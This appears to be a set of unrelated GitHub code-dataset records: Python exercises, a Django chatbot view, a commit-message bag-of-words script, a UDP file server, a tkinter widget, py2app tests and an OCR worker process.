execution.\n","repo_name":"BCI-NE/PES","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":20454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34011808997","text":"# Read values into the list\nnumbers_list = []\nwhile True:\n ele = int(input('Enter a number: '))\n if ele in numbers_list:\n print('That number is already in the list')\n else:\n numbers_list.append(ele)\n saida = 'zerado'\n
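# NOTE: these membership tests are substring checks, so an empty reply matches\n# any pattern ('' in 'nNsS' is True) and a bare Enter ends the loop;\n# e.g. 'n' in 'nN' -> True, '' in 'nN' -> True, 'no' in 'nN' -> False\n# Exit check\n while saida not in 'nNsS':\n saida = str(input('Do you want to continue? 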
[S/N]: '))\n if saida in 'nN':\n break\n# Print the list sorted in ascending order\nnumbers_list.sort()\nprint(f'List in ascending order: {numbers_list}')\n\n","repo_name":"arthurtomas/Codes_git","sub_path":"desafio079.py","file_name":"desafio079.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14609992913","text":"import json\nfrom django.http import JsonResponse, Http404\nfrom .bot import Chat\nfrom django.views.decorators.csrf import csrf_exempt\n\nBAD_REQUEST = {\n 'detail': \"This request is not defined for this route\"\n}\n\n# Create your views here.\n\n\n@csrf_exempt\ndef getChatbotResponse(request):\n # django.middleware.csrf.get_token(request)\n if request.method != 'POST':\n Http404(\"\")\n return JsonResponse(BAD_REQUEST, status=404)\n else:\n inputData = json.loads(request.body)\n user = Chat()\n message = dict(inputData)['message']\n return JsonResponse(user.getChatbotResponse(message))\n","repo_name":"MyAerothonTeam/Konnex","sub_path":"ServerEnd/KonnexApi/Chatbot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12276649180","text":"import pandas as pd\nimport csv\nfrom collections import Counter\nimport os\nimport matplotlib.pyplot as plt\nimport spacy\nimport seaborn as sns\nfrom spacy.matcher import Matcher\nfrom nltk.stem.porter import *\nimport re\nfrom nltk import ngrams\nfrom nltk.corpus import stopwords\nfrom bs4 import BeautifulSoup\n\n# Download stopwords\n# import nltk\n# nltk.download('stopwords')\n\nREPLACE_BY_SPACE_RE = re.compile('[/(){}\\[\\]\\|@,;]')\nBAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')\nSTOPWORDS = set(stopwords.words('english'))\n# Example\n# path = 'final-results/awesome-docker/sprint_week_master.csv'\n# or path = 'data-results/sprint_week_repositoryname.csv'\n# change path as needed\npartial_path = input(\"Enter CSV Repositories: data-results/bow_sprint_week_\")\npath = \"data-results/bow_sprint_week_\" + partial_path\npath_split = path.split('/')\n\ndata_sprint = pd.read_csv(path) # load the data\ndata_sprint = data_sprint[pd.notnull(data_sprint['Msg_data'])] # drop rows with missing msg\n\n\n#print(data_sprint.head(10))\n\ndef clean_text(text):\n text = BeautifulSoup(text, \"lxml\").text # HTML decoding\n text = text.lower() # lowercase text\n text = REPLACE_BY_SPACE_RE.sub(' ', text) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub(' ', text) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join(parola for parola in text.split() if parola not in STOPWORDS) # delete stopwords from text\n return text\n\n#print(data_sprint['Msg_data'][4])\ndata_sprint['Msg_data'] = data_sprint['Msg_data'].apply(clean_text)\n#print(data_sprint['Msg_data'][4])\n
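# e.g. (assumed input) clean_text('Fixed the [NPE] bug!') -> 'fixed npe bug'\n\n\n# ==============\n\n# STEMMING\nstemmer = PorterStemmer()\n\n# csv header\ncsv_headers = [\"Day\", \"Week\", \"Msg_data\"]\n\n# Save the stemmed messages to file: stemmingbowset.csv\nwith open(\"stemmingbowset.csv\", 'w') as f:\n writer = csv.DictWriter(f, fieldnames=csv_headers)\n writer.writeheader()\n for i, line in enumerate(data_sprint['Msg_data']):\n word_str = \"\"\n for word in line.split():\n word_str += stemmer.stem(word) + \" \"\n #print(i, word_str)\n writer.writerow({'Day': data_sprint['Day'][i], 'Week': data_sprint['Week'][i], 'Msg_data': word_str})\nf.close()\n\n# ==============\n\n# Most common 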
word\ndata_sprint = pd.read_csv(\"stemmingbowset.csv\")\n\nmsg_occurrences = []\n\nfor msg in data_sprint['Msg_data']:\n for word in msg.split():\n msg_occurrences.append(word)\n# print(msg_occurrences)\n\noccurrences = Counter(msg_occurrences)\n\n# Top 10 BoW Frequency:\ntext_box = '#Top BoW Frequency'\nconteggio = 0\nfor most_word in occurrences.most_common(20):\n if not most_word[0].isdigit() and conteggio < 11:\n text_box += '\\n' + most_word[0] + ': ' + str(most_word[1])\n conteggio += 1\n#print(text_box)\n\n# Top n-grams token:\ntokenstr = ''\nfor token in msg_occurrences:\n if not token.isdigit():\n tokenstr += token + ' '\nmost_coulpe_token = Counter(list(ngrams(tokenstr.split(), 2)))\n\n# Top 10 n-grams token:\ntext_box_pair = '#Top BoW Pair Token'\nconteggio = 0\nfor most_word in most_coulpe_token.most_common(10):\n \"\"\" if ', ' in commits_main_year_week:\n commits_main_year_week.remove(', ')\n commits_main_year_week.remove('[')\n commits_main_year_week.remove(']')\"\"\"\n text_box_pair += '\\n' + str(most_word[0]) + ': ' + str(most_word[1])\n conteggio += 1\n# print(text_box_pair)\n\n# ================\ndata_sprint = pd.read_csv(\"stemmingbowset.csv\")\nnlp = spacy.load('en_core_web_sm')\n\nm_tool = Matcher(nlp.vocab)\n\nfix = [[{\"LOWER\": \"fix\"}],\n [{\"TEXT\": {\"REGEX\": \"^fix\"}}]]\n\ntest = [[{\"LOWER\": \"test\"}],\n [{\"TEXT\": {\"REGEX\": \"^test\"}}]]\n\nbug = [[{\"LOWER\": \"bug\"}],\n [{\"TEXT\": {\"REGEX\": \"^bug\"}}]]\n\ndebug = [[{\"LOWER\": \"debug\"}],\n [{\"TEXT\": {\"REGEX\": \"^debug\"}}]]\n\nrefactoring = [[{\"LOWER\": \"refact\"}],\n [{\"TEXT\": {\"REGEX\": \"^refact\"}}]]\n\nfeature = [[{\"LOWER\": \"feature\"}],\n [{\"TEXT\": {\"REGEX\": \"^feature\"}}]]\n\ndocumentation = [[{\"LOWER\": \"documentation\"}],\n [{\"TEXT\": {\"REGEX\": \"^documentation\"}}]]\n\nm_tool.add('FIX', fix, on_match=None)\nm_tool.add('TEST', test, on_match=None)\nm_tool.add('BUG', bug, on_match=None)\nm_tool.add('DEBUG', debug, on_match=None)\nm_tool.add('REF', refactoring, on_match=None)\nm_tool.add('FEAT', feature, on_match=None)\nm_tool.add('DOC', documentation, on_match=None)\n\n# CSV header\nfieldnam = ['Day', 'Week', 'Tag']\n\nwith open(\"finale.csv\", 'w') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnam)\n writer.writeheader()\nf.close()\n\nfor index, row in data_sprint.iterrows():\n sentence = nlp(row['Msg_data'])\n phrase_matches = m_tool(sentence)\n for match_id, start, end in phrase_matches:\n string_id = nlp.vocab.strings[match_id] # Get string representation: 'FIX'\n span = sentence[start:end] # The matched span\n if span.text:\n with open(\"finale.csv\", 'a') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnam)\n writer.writerow({'Day': row['Day'], 'Week': row['Week'], 'Tag': string_id})\n f.close()\n\n# -----------------------\n# bow + tag count\ndata_count = pd.read_csv('finale.csv')\n\ndata_count_head = [\"Day\", \"Week\", \"Tag\", \"#Tag\"]\n\nweek_grouped = data_count.groupby([\"Day\", \"Week\"])[\"Tag\"].value_counts()\nwith open(\"bow_tag.csv\", 'w') as f:\n writer = csv.DictWriter(f, fieldnames=data_count_head)\n writer.writeheader()\nf.close()\n\nbow = pd.DataFrame(week_grouped)\nbow.to_csv(\"bow_tag.csv\", header=False, mode=\"a\")\n\n# -----------------------\n# bow tag filter: collapse multiple tags per sprint day into a single tag\n\ndata_count_filter = pd.read_csv('bow_tag.csv')\n\n
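# Keep only the most frequent tag per day; e.g. (assumed rows) ('2020-01-06', 'FIX', 3)\n# and ('2020-01-06', 'TEST', 1) collapse to the single 'FIX' row.\nwith open(\"bow_tag_filter.csv\", 'w') as f:\n writer = csv.DictWriter(f, fieldnames=data_count_head)\n writer.writeheader()\n for i, line in 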
enumerate(data_count_filter['Day']): # loop over the days\n if i == 0:\n prec = line\n max_index = i\n continue\n if prec == line: # same day with different tags\n # print(i, \"equal: \", prec, \" - \", line)\n if data_count_filter['#Tag'][i - 1] < data_count_filter['#Tag'][i]:\n prec = line\n max_index = i\n else: # different day: save the previous one\n # print(i, \"different: \", prec, \" - \", line, \" saving\")\n writer.writerow({'Day': data_count_filter['Day'][max_index], 'Week': data_count_filter['Week'][max_index],\n 'Tag': data_count_filter['Tag'][max_index], '#Tag': data_count_filter['#Tag'][max_index]})\n prec = line\n max_index = i\n\n if i == len(data_count_filter['Day']) - 1: # need to save the last one\n # print(i, \"last\")\n # if data_count_filter['Day'][i] != data_count_filter['Day'][i-1]: # if different from the second-to-last - save\n writer.writerow({'Day': data_count_filter['Day'][max_index], 'Week': data_count_filter['Week'][max_index],\n 'Tag': data_count_filter['Tag'][max_index], '#Tag': data_count_filter['#Tag'][max_index]})\nf.close()\n\nos.remove('stemmingbowset.csv')\nos.remove('finale.csv')\nos.remove('bow_tag.csv')\n\n# ----------------\n# Join the scrum data with the sprints derived from the BoW tags\n\ndata_bow = pd.read_csv(\"bow_tag_filter.csv\") # load the bow data\n\n# ask for the main scrum sprint data\npartial_path = input(\"Enter CSV Repositories Main to join: data-results/sprint_week_\")\nmain_path = \"data-results/sprint_week_\" + partial_path\ntext_path_split = main_path.split('/')\nmain_data = pd.read_csv(main_path) # load the text branch data\n\nmain_datax = [x[:4] + \"-\" + str(y) for x, y in\n zip(main_data['Day'], main_data['Week'])] # data in year-week form\ndatab = [x[:4] + \"-\" + str(y) for x, y in zip(data_bow['Day'], data_bow['Week'])]\n\nsns.set() # equivalent to plt.grid(True)\n\ndevelopment_y = []\ntest_fix_y = []\n# Determine the labels to plot\nfor indice, valore in enumerate(main_datax): # year-week\n if valore in datab: # found a week analysed under BoW\n if data_bow[\"Tag\"][datab.index(valore)] in ['FIX', 'TEST', 'BUG', 'DEBUG', 'REF', 'DOC']:\n test_fix_y.append(main_data['Sprint_week'][indice])\n development_y.append(0)\n else:\n test_fix_y.append(0)\n development_y.append(main_data['Sprint_week'][indice])\n else:\n test_fix_y.append(0)\n development_y.append(main_data['Sprint_week'][indice])\n\n
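# e.g. (assumed data) a week tagged 'FIX' contributes its commit count to test_fix_y and 0 to\n# development_y, so the two bar series below never overlap on the same x position.\n\nplt.figure(1)\nbarlist_development = plt.bar(main_datax, development_y, label='Development')\nbarlist_test_fix = plt.bar(main_datax, test_fix_y, color='g', label='FIX-TEST-BUG-DEBUG-REF-DOC')\nplt.legend(loc='upper right')\nplt.xticks(main_datax, main_datax, rotation=90) # x\nplt.xlabel('Weekly commits') # x\nplt.ylabel('Number of changes') # y\nplt.suptitle(path_split[len(path_split) - 1], fontsize=10)\nplt.title('Sprint Weekly trend BoW', fontsize=15)\n\n# these are matplotlib.patch.Patch properties\nprops = dict(boxstyle='round,pad=0.5', facecolor='white', alpha=0.5, edgecolor='black')\n\nplt.annotate(text_box, xy=(0, 1), xytext=(12, -12), va='top', annotation_clip=False,\n xycoords='axes fraction', textcoords='offset points', bbox=props)\n# (-0.15, 1) (-0.17, 1) (0, 1)\nplt.annotate(text_box_pair, xy=(0.13, 1), xytext=(12, -12), va='top', annotation_clip=False,\n xycoords='axes fraction', textcoords='offset points', bbox=props)\n# (-0.21, 0.33) (-0.21, 0.33) (0.13, 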
1)\nplt.show()\n\nos.remove('bow_tag_filter.csv')\n","repo_name":"Fliki1/MSR","sub_path":"Sprint_BoW_plot.py","file_name":"Sprint_BoW_plot.py","file_ext":"py","file_size_in_byte":9439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"7353198746","text":"'''\nN = int(input())\narr = list(map(int, input().split()))\nclean = 21e8\nfor i in range(N-1):\n for j in range(i+1, N):\n temp = arr[i]+arr[j]\n if clean > abs(temp):\n clean = abs(temp)\n pair = [arr[i], arr[j]]\n if clean == abs(temp):\n if abs(pair[0]) + abs(pair[1]) > abs(arr[i]) + abs(arr[j]):\n continue\n else:\n pair = [arr[i], arr[j]]\npair.sort()\nprint(*pair)\n'''\n# Instructor's solution\n\nn = int(input())\narr = list(map(int, input().split()))\narr.sort()\n# initialize the two pointers\nleft = 0\nright = n-1\n# initialize tracking variables\nminimum = 2e9 +1\nansleft, ansright = 0, 0\nwhile left < right:\n sum = arr[left] + arr[right] # compute the pair sum\n if sum == 0:\n print(arr[left], arr[right])\n exit() # unlike break, this terminates the whole program\n # track the minimum difference using the absolute value\n if minimum > abs(sum):\n minimum = abs(sum)\n ansleft = left\n ansright = right\n # if the sum is greater than 0 decrease right; if less than 0 increase left\n if sum > 0:\n right -= 1\n else:\n left += 1\nprint(arr[ansleft], arr[ansright])\n
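# Worked example (assumed input): arr = [2, 7, -8, -3] -> sorted [-8, -3, 2, 7];\n# (-8,7)=-1 becomes best, (-3,7)=4 so right-=1, (-3,2)=-1 is not strictly smaller, so it prints: -8 7\n","repo_name":"defkimbyeongju/algorithm","sub_path":"sliding_twopointer/dirty_water.py","file_name":"dirty_water.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22276724185","text":"# Code for the UDP server application\r\nimport socket\r\nimport time\r\nimport os\r\nimport sys\r\nimport threading\r\nfrom datetime import datetime\r\nimport time\r\n\r\n#IP = 'localhost'\r\nIP = '172.16.21.129'\r\nPORT = 7000\r\nruta_archivo = \"\"\r\nbarrier = None\r\nservidor = None\r\n\r\n\r\ndef thread_function(client_address):\r\n tName = threading.current_thread().getName()\r\n pservidor(f'{tName} has connected on port {client_address[1]}')\r\n # pservidor(f'The file at {ruta_archivo} will be sent to {tName}')\r\n pservidor(f'{tName} waiting')\r\n barrier.wait()\r\n\r\n buffSize = 8192\r\n c = 0\r\n sizeS = os.stat(ruta_archivo)\r\n sizeSS = sizeS.st_size # size in bytes\r\n NumS = int(sizeSS / buffSize)\r\n NumS = NumS + 1\r\n\r\n check = int(NumS)\r\n archivo = open(ruta_archivo, \"rb\")\r\n pservidor(f'Started sending packets to client {tName}')\r\n aviso = True\r\n starttime = time.time()\r\n lasttime = starttime\r\n \r\n \r\n while check != 0:\r\n paquete = archivo.read(buffSize)\r\n servidor.sendto(paquete, client_address)\r\n c += 1\r\n check -= 1\r\n porcentaje = (c/NumS)*100 // 1\r\n if porcentaje == 50 and aviso == True:\r\n pservidor(f'{porcentaje}% of the packets have been sent to client {tName}')\r\n aviso = False\r\n \r\n laptime = round((time.time() - lasttime), 2) \r\n pservidor(f'All packets sent to {tName}')\r\n archivo.close()\r\n \r\n now = datetime.today()\r\n ruta = f'Logs/S-{tName}-{now.year}-{now.month}-{now.day}-{now.hour}-{now.minute}-{now.second}.txt'\r\n file = open(ruta, \"w\")\r\n file.write(f'File name: {ruta_archivo[-9:]}\\nSize: {ruta_archivo[-9:-4]}\\nClient: {tName}\\nTime: {laptime}')\r\n file.close()\r\n \r\n\r\ndef pservidor(msj):\r\n print(f\"[SERVER] {msj}\")\r\n\r\n\r\ndef main():\r\n # SERVER APPLICATION CONFIGURATION\r\n global ruta_archivo\r\n global barrier\r\n global servidor\r\n # Choose which file to work with\r\n res_archivo = input('Which file 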
desea recibir sus clientes?\\n[1] 100 MB\\n[2] 250 MB\\n')\r\n # if/elif chain to set the file path\r\n if int(res_archivo) == 1:\r\n ruta_archivo = \"archivos_servidor/100MB.txt\"\r\n\r\n elif int(res_archivo) == 2:\r\n ruta_archivo = \"archivos_servidor/250MB.txt\"\r\n else:\r\n ruta_archivo = \"archivos_servidor/prueba.txt\"\r\n\r\n\r\n # How many clients will be handled\r\n num_clientes = int(input('¿Cuántos clientes quiere conectados?\\nOpciones válidas: 1,5,10\\n'))\r\n\r\n barrier = threading.Barrier(num_clientes)\r\n size = os.stat(ruta_archivo)\r\n sizeSS = size.st_size\r\n pservidor(f'Tamaño del archivo en bytes: {str(sizeSS)}')\r\n pservidor(f'El número de paquetes serán: {sizeSS/64000}')\r\n\r\n # SERVER CREATION AND INITIALISATION\r\n servidor = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n pservidor('Inicializado')\r\n servidor.bind((IP, PORT))\r\n pservidor('Esperando conexiones')\r\n data = servidor.recvfrom(1024)\r\n\r\n info = data[0].decode('utf-8')\r\n\r\n if info == \"CONFIG\":\r\n pservidor('Se ha recibido la solicitud para configurar la aplicación CLIENTE')\r\n servidor.sendto(f'{ruta_archivo}@{num_clientes}@{sizeSS}'.encode('utf-8'),data[1])\r\n pservidor(f'Se ha enviado la información para configurar la aplicación CLIENTE a través de: {data[1]}')\r\n else:\r\n pservidor(f'No se ha recibido la información correcta\\nSe ha recibido: {data}')\r\n\r\n # END OF SERVER APPLICATION CONFIGURATION\r\n\r\n i = 1\r\n while True:\r\n data, client_address = servidor.recvfrom(1024)\r\n cliente = threading.Thread(target=thread_function, name=\"Cliente \"+str(i),args=(client_address,))\r\n cliente.start()\r\n i=i+1\r\n\r\n\r\n servidor.close()\r\n #pservidor('Conexiones cerradas')\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"drincon1/Lab3-2","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35568353286","text":"import tkinter as tk\n\n\nclass VerticalScrolledFrame(tk.Frame):\n \"\"\"\n Adapted from https://stackoverflow.com/questions/16188420/tkinter-scrollbar-for-frame\n \"\"\"\n\n def __init__(self, parent, *args, **kw):\n super().__init__(parent, *args, **kw)\n\n # create a canvas object and a vertical scrollbar for scrolling it\n v_scrollbar = tk.Scrollbar(self, orient=tk.VERTICAL)\n v_scrollbar.pack(fill=tk.Y, side=tk.RIGHT, expand=tk.FALSE)\n canvas = tk.Canvas(self, bd=0, highlightthickness=0,\n yscrollcommand=v_scrollbar.set)\n self.canvas = canvas\n canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=tk.TRUE)\n v_scrollbar.config(command=canvas.yview)\n\n # reset the view\n canvas.xview_moveto(0)\n canvas.yview_moveto(0)\n\n # create a frame inside the canvas which will be scrolled with it\n self.interior = interior = tk.Frame(canvas)\n interior_id = canvas.create_window(0, 0, window=interior,\n anchor=tk.NW)\n\n # track changes to the canvas and frame width and sync them,\n # also updating the scrollbar\n def _configure_interior(_event):\n # update the scrollbars to match the size of the inner frame\n canvas.config(scrollregion=(0, 0, interior.winfo_reqwidth(), interior.winfo_reqheight()))\n if interior.winfo_reqwidth() != canvas.winfo_width():\n # update the canvas's width to fit the inner frame\n canvas.config(width=interior.winfo_reqwidth())\n\n interior.bind('<Configure>', _configure_interior)\n\n def _configure_canvas(_event):\n if interior.winfo_reqwidth() != canvas.winfo_width():\n # update the 
inner frame's width to fill the canvas\n canvas.itemconfigure(interior_id, width=canvas.winfo_width())\n\n canvas.bind('<Configure>', _configure_canvas)\n\n def _on_mousewheel(event):\n canvas.yview_scroll(int(-1 * (event.delta / 120)), \"units\")\n\n interior.bind(\"<Enter>\", lambda event: canvas.bind_all(\"<MouseWheel>\", _on_mousewheel))\n interior.bind(\"<Leave>\", lambda event: canvas.unbind_all(\"<MouseWheel>\"))\n\n def scroll_to_end(self):\n self.canvas.yview_moveto(1)\n","repo_name":"olisolomons/rent_manager.py","sub_path":"src/tk_utils/vertical_scrolled_frame.py","file_name":"vertical_scrolled_frame.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36243497393","text":"import os\nimport plistlib\nimport shutil\nimport subprocess\nimport sys\nimport time\nimport unittest\n\nimport py2app\n\nfrom .tools import kill_child_processes\n\nDIR_NAME = os.path.dirname(os.path.abspath(__file__))\n\n\nclass TestBasicApp(unittest.TestCase):\n py2app_args = []\n app_dir = os.path.join(DIR_NAME, \"app_with_data\")\n\n # Basic setup code\n #\n # The code in this block needs to be moved to\n # a base-class.\n @classmethod\n def setUpClass(cls):\n kill_child_processes()\n\n env = os.environ.copy()\n pp = os.path.dirname(os.path.dirname(py2app.__file__))\n if \"PYTHONPATH\" in env:\n env[\"PYTHONPATH\"] = pp + \":\" + env[\"PYTHONPATH\"]\n else:\n env[\"PYTHONPATH\"] = pp\n\n p = subprocess.Popen(\n [sys.executable, \"setup.py\", \"py2app\"] + cls.py2app_args,\n cwd=cls.app_dir,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n close_fds=False,\n env=env,\n )\n lines = p.communicate()[0]\n if p.wait() != 0:\n print(lines)\n raise AssertionError(\"Creating basic_app bundle failed\")\n\n @classmethod\n def tearDownClass(cls):\n if os.path.exists(os.path.join(cls.app_dir, \"build\")):\n shutil.rmtree(os.path.join(cls.app_dir, \"build\"))\n\n if os.path.exists(os.path.join(cls.app_dir, \"dist\")):\n shutil.rmtree(os.path.join(cls.app_dir, \"dist\"))\n\n time.sleep(2)\n\n def assertContentsEqual(self, src_file, dst_file):\n fp = open(src_file, \"rb\")\n src_data = fp.read()\n fp.close()\n\n fp = open(dst_file, \"rb\")\n dst_data = fp.read()\n fp.close()\n\n self.assertEqual(src_data, dst_data)\n\n def test_icon_file(self):\n resource_dir = os.path.join(\n self.app_dir, \"dist\", \"SimpleApp.app\", \"Contents\", \"Resources\"\n )\n\n with open(os.path.join(resource_dir, \"..\", \"Info.plist\"), \"rb\") as fp:\n if hasattr(plistlib, \"load\"):\n pl = plistlib.load(fp)\n else:\n pl = plistlib.readPlist(fp)\n\n self.assertEqual(pl[\"CFBundleIconFile\"], \"main.icns\")\n\n src_file = os.path.join(self.app_dir, \"main.icns\")\n dst_file = os.path.join(resource_dir, \"main.icns\")\n self.assertTrue(os.path.exists(dst_file))\n\n self.assertContentsEqual(src_file, dst_file)\n\n if \"--alias\" in self.py2app_args:\n self.assertTrue(os.path.islink(dst_file))\n\n def test_resources(self):\n resource_dir = os.path.join(\n self.app_dir, \"dist\", \"SimpleApp.app\", \"Contents\", \"Resources\"\n )\n\n src_file = os.path.join(self.app_dir, \"data3\", \"source.c\")\n dst_file = os.path.join(resource_dir, \"source.c\")\n\n self.assertTrue(os.path.exists(dst_file))\n\n self.assertContentsEqual(src_file, dst_file)\n\n if \"--alias\" in self.py2app_args:\n self.assertTrue(os.path.islink(dst_file))\n\n def test_executable_resource(self):\n resource_dir = os.path.join(\n self.app_dir, \"dist\", \"SimpleApp.app\", \"Contents\", \"Resources\"\n )\n src_file = 
os.path.join(self.app_dir, \"data1\", \"file3.sh\")\n dst_file = os.path.join(resource_dir, \"sub1\", \"file3.sh\")\n\n src_st = os.stat(src_file)\n dst_st = os.stat(dst_file)\n\n self.assertEqual(\n src_st.st_mode,\n dst_st.st_mode,\n f\"{src_st.st_mode:o} != {dst_st.st_mode:o}\",\n )\n\n def test_data_files(self):\n resource_dir = os.path.join(\n self.app_dir, \"dist\", \"SimpleApp.app\", \"Contents\", \"Resources\"\n )\n\n for src_path, dst_path, chk_link in [\n (\"data1/file1.txt\", \"sub1/file1.txt\", True),\n (\"data1/file2.txt\", \"sub1/file2.txt\", True),\n (\"data1/file3.sh\", \"sub1/file3.sh\", True),\n (\"data2/source.c\", \"data2/source.c\", False),\n ]:\n src_file = os.path.join(self.app_dir, src_path)\n dst_file = os.path.join(resource_dir, dst_path)\n\n self.assertTrue(os.path.exists(dst_file))\n\n self.assertContentsEqual(src_file, dst_file)\n\n if chk_link and \"--alias\" in self.py2app_args:\n self.assertTrue(\n os.path.islink(dst_file), f\"{dst_file} is not a symlink\"\n )\n\n # if '--alias' in self.py2app_args:\n # self.assertTrue(os.path.islink(os.path.join(resource_dir, 'data2')))\n\n\nclass TestBasicAliasApp(TestBasicApp):\n py2app_args = [\n \"--alias\",\n ]\n\n\nclass TestBasicSemiStandaloneApp(TestBasicApp):\n py2app_args = [\n \"--semi-standalone\",\n ]\n","repo_name":"ronaldoussoren/py2app","sub_path":"py2app_tests/test_app_resources.py","file_name":"test_app_resources.py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"19"} +{"seq_id":"40537926539","text":"#!/usr/bin/python3\n\nimport re\nimport sys\nimport csv\n\nlineasfile = sys.argv[1]\n\ndef openfile_errors(lineasfile):\n with open(lineasfile) as f:\n conteo = {}\n i = 0\n for line in f:\n pattern = \"([A-Z]+) ([a-zA-Z \\.\\']+) \" \n response = re.search(pattern,line)\n if response.group(1) == \"ERROR\":\n var_value = conteo.get(response.group(2))\n if var_value is None:\n var_value = 0\n conteo[response.group(2)] = var_value + 1\n conteo_values = sorted(conteo.values(),reverse=True)\n conteo_sorted = {}\n for i in conteo_values:\n for k in conteo.keys():\n if conteo[k] == i:\n conteo_sorted[k] = conteo[k]\n return conteo_sorted\ndef list_csv(conteo_sorted):\n list_errors = []\n for error, count in conteo_sorted.items():\n dict_new = {}\n dict_new[\"Error\"] = error\n dict_new[\"Count\"] = count\n list_errors.append(dict_new)\n return list_errors\n\ndef create_csv(list_errors):\n names_field = ['Error', 'Count']\n with open('error_message.csv', 'w') as error_message:\n writer = csv.DictWriter(error_message, fieldnames=names_field)\n writer.writeheader()\n writer.writerows(list_errors)\n\ncreate_csv(list_csv(openfile_errors(lineasfile))) \n","repo_name":"pkill2913/Coursera_python","sub_path":"tallerfinal.py","file_name":"tallerfinal.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74452475563","text":"import os\nimport time\nimport torch\nfrom PIL import Image\nimport multiprocessing\nimport threading\n\nfrom transformers import ViTForImageClassification, ViTImageProcessor\n# from paddleocr import PaddleOCR, draw_ocr\nimport easyocr\nfrom logger import logger_model_2, logger_model_2_rate\nfrom request import Request\n\nmodel_2_lock = multiprocessing.Lock()\n\nclass Model_2(multiprocessing.Process):\n def __init__(self, id, car_frames_list, draw_message_list, end_signal, to_monitor_rate):\n super().__init__()\n 
self.id = id\n self.car_frames_list = car_frames_list\n self.draw_message_list = draw_message_list\n self.end_signal = end_signal\n \n self.device = None\n self.model = None\n self.processor = None\n\n self.reader = None\n\n self.timer_logger_model_2 = time.time()\n self.to_monitor_rate = to_monitor_rate\n\n def run(self):\n self.device = torch.device(\"cuda:0\")\n # self.processor = ViTImageProcessor.from_pretrained('google/vit-base-patch16-224')\n # self.model = ViTForImageClassification.from_pretrained('google/vit-base-patch16-224').to(self.device)\n self.reader = easyocr.Reader(['ch_sim', 'en'], gpu=True)\n\n self.end_signal.value += 1\n\n # if self.id == 1:\n # thread_monitor_rate = threading.Thread(target=self.monitor_rate)\n # thread_monitor_rate.start()\n\n print(f\"[Model_2_{self.id}] start\")\n logger_model_2.info(f\"[Model_2_{self.id}] start\")\n\n # threads = []\n\n while True:\n time.sleep(0.01)\n # car_frame = None\n with model_2_lock:\n request = self.car_frames_list.get()\n if request.signal == -1:\n self.car_frames_list.put(request) # put the end signal back\n print(f\"[Model_2_{self.id}] end\")\n logger_model_2.info(f\"[Model_2_{self.id}] end\")\n self.end_signal.value -= 1\n # print(f\"[Model_2_{self.id}] self.end_signal.value: {self.end_signal.value}\")\n logger_model_2.info(f\"[Model_2_{self.id}] self.end_signal.value: {self.end_signal.value}\")\n if self.end_signal.value == 0:\n self.draw_message_list.put(request) # TODO\n break\n \n if time.time() - self.timer_logger_model_2 > 5:\n # print(f\"[Model_2_{self.id}] frame_filename: \", frame[1])\n logger_model_2.info(f\"[Model_2_{self.id}] frame_filename: {request.ids}, and car_frames_list: {self.car_frames_list.qsize()}\")\n self.timer_logger_model_2 = time.time()\n if isinstance(request, Request):\n # thread = threading.Thread(target=self.process_image, args=(request,)) # TODO\n # thread.start()\n # threads.append(thread)\n\n # if len(threads) > 16:\n # threads[0].join()\n # threads.pop(0)\n\n self.process_image(request)\n \n # for thread in threads:\n # thread.join()\n # threads = []\n\n def monitor_rate(self):\n rates = []\n sliding_window_size = 5\n last_car_frame = \"\"\n last_car_frames_list_len = 0\n while True:\n time.sleep(1e-6)\n with model_2_lock:\n if self.end_signal.value == 0:\n break\n try: \n if (len(self.car_frames_list) > 0 and self.car_frames_list[-1][1] != last_car_frame) or len(self.car_frames_list) > last_car_frames_list_len:\n self.to_monitor_rate.append(time.time())\n last_car_frame = self.car_frames_list[-1][1]\n last_car_frames_list_len = len(self.car_frames_list)\n except Exception as e:\n # logger_model_2.warning(f\"[Model_2_{self.id}] {e}, and car_frames_list[-1]: {self.car_frames_list[-1]}, and last_car_frame: {last_car_frame}\")\n ...\n\n if len(self.to_monitor_rate) > 1:\n rate = round((len(self.to_monitor_rate) - 1) / (self.to_monitor_rate[-1] - self.to_monitor_rate[0]), 3)\n rates.append(rate)\n if len(rates) > sliding_window_size:\n rates.pop(0)\n total_weight = sum(range(1, len(rates) + 1))\n weighted_sum = sum((i + 1) * rate for i, rate in enumerate(rates))\n moving_average = round(weighted_sum / total_weight, 3)\n # print(f\"[Model_2_{self.id}] rate: {moving_average}\")\n logger_model_2.info(f\"[Model_2_{self.id}] rate: {moving_average}\")\n logger_model_2_rate.info(f\"{moving_average}\")\n self.to_monitor_rate[:] = self.to_monitor_rate[-1:]\n \n def process_image_2(self, request):\n image_array, box, v_id, f_id, d_id = request.data, request.box, request.ids[0], request.ids[1], 
